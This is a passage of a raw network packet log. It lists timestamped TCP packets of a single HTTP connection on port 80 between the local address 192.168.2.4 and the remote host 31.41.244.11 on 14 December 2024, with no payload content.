Dec 14, 2024 23:58:19.515927076 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.517683029 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.517752886 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.517754078 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.517803907 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.519690990 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.519829035 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.519880056 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.519983053 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.522069931 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.522139072 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.522159100 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.522598982 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.523812056 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.523881912 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.523941040 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.523991108 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.525897026 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.525996923 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.526086092 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.526140928 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.528017044 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.528073072 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.528201103 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.528343916 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.530025005 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.530082941 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.530165911 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.530262947 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.532075882 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.532222033 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.532278061 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.534146070 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.534198046 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.534270048 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.534318924 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.536264896 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.536329031 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.536366940 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.536416054 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.538295984 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.538352966 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.538425922 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.538471937 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.540363073 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.540481091 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.540519953 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.540570021 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.542453051 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.542522907 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.542594910 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.542644024 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.544579983 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.544661999 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.544680119 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.544763088 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.546580076 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.546637058 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.546719074 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.546772957 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.548667908 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.548738003 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.548806906 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.548867941 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.550659895 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.550725937 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.550806046 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.550942898 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.552742004 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.552881956 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.552891016 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.553251982 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.554822922 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.554897070 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.554964066 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.555022001 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.556885004 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.556950092 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.557020903 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.557142019 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.558947086 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.559025049 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.559073925 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.559211969 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.561017036 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.561070919 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.561167002 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.561219931 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.563060045 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.563114882 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.563196898 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.563357115 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.565135956 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.565191031 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.565272093 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.565340042 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.567187071 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.567250967 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.567356110 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.567425013 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.569247007 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.569374084 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.569401026 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.569696903 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.571397066 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.571461916 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.571531057 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.571579933 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.573380947 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.573458910 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.573523998 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.573589087 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.575449944 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.575525999 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.575581074 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.575633049 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.577519894 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.577583075 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.577666044 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.577889919 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.579571009 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.579629898 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.579725981 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.579896927 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.581625938 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.581676960 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.581762075 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.581809998 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.583698988 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.583758116 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.583941936 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.584012985 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.585772038 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.585869074 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.585911036 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.585968018 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.587832928 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.587905884 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.587975979 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.588026047 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.589905977 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.589966059 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.590046883 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.590095043 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.591974974 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.592066050 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.592108011 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.592165947 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.594141960 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.594203949 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.594274998 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.594326973 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.596098900 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.596162081 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.596230984 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.596290112 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.598160028 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.598211050 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.598361015 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.683870077 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.683936119 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.684047937 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.684251070 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.684640884 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.684698105 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.684778929 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.685033083 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.686487913 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.686548948 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.686670065 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.687541008 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.688286066 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.688343048 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.688437939 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.688533068 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.690126896 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.690185070 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.690253019 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.690306902 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.691911936 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.691975117 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.692061901 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.692126989 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.693664074 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.693721056 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.693804979 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.693854094 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.695477962 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.695540905 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.695609093 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.695841074 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.697129011 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.697185040 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.697252989 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.697374105 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.698834896 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.698889017 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.698976040 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.699024916 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.700484037 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.700545073 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.700611115 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.700690031 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.702176094 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.702230930 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.702299118 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.702351093 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.703811884 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.703870058 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.703938961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.703989029 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.705446959 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.705565929 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.705621004 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.705621004 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.707043886 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.707149982 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.707170963 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.707214117 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.708682060 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.708739996 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.708880901 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.709006071 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.710256100 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.710309982 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.710378885 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.710872889 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.711849928 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.711909056 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.712023020 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.712130070 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.713469982 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.713521957 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.713603020 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.713654995 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.715022087 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.715074062 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.715157986 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.715217113 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.716640949 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.716698885 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.716767073 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.716825962 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.718255043 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.718318939 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.718374014 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.718715906 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.719856024 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.719913006 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.719981909 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.720164061 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.721483946 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.721539974 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.721607924 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.721671104 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.723196030 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.723269939 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.723352909 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.723403931 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.724533081 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.724586010 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.724669933 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.724714994 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.726028919 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.726141930 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.726154089 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.726310968 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.727500916 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.727603912 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.727674961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.727794886 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.728987932 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.729068995 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.729120970 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.729170084 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.730459929 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.730525017 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.730576038 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.730787992 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.731931925 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.732003927 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.732052088 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.732100010 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.733515024 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.733578920 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.733649015 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.733697891 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.734970093 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.735025883 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.735094070 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.735169888 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.736367941 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.736438990 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.736500025 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.736706972 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.737874985 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.737926960 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.737994909 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.738109112 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.739331961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.739383936 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.739434958 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.739480972 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.740802050 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.740879059 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.740947008 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.741170883 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.742320061 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.742384911 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.742448092 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.743473053 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.743771076 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.743880033 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.743935108 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.745748997 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.745867968 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.745929956 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.746711969 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.746850967 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.746923923 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.748195887 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.748414040 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.748478889 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.749658108 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.749763012 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.749850988 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.749922037 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.751127958 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.751177073 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.751290083 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.751933098 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.752754927 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.752806902 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.752810001 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.752929926 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.754132986 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.754246950 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.754265070 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.755233049 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.755563021 CET	80	49793	31.41.244.11	192.168.2.4
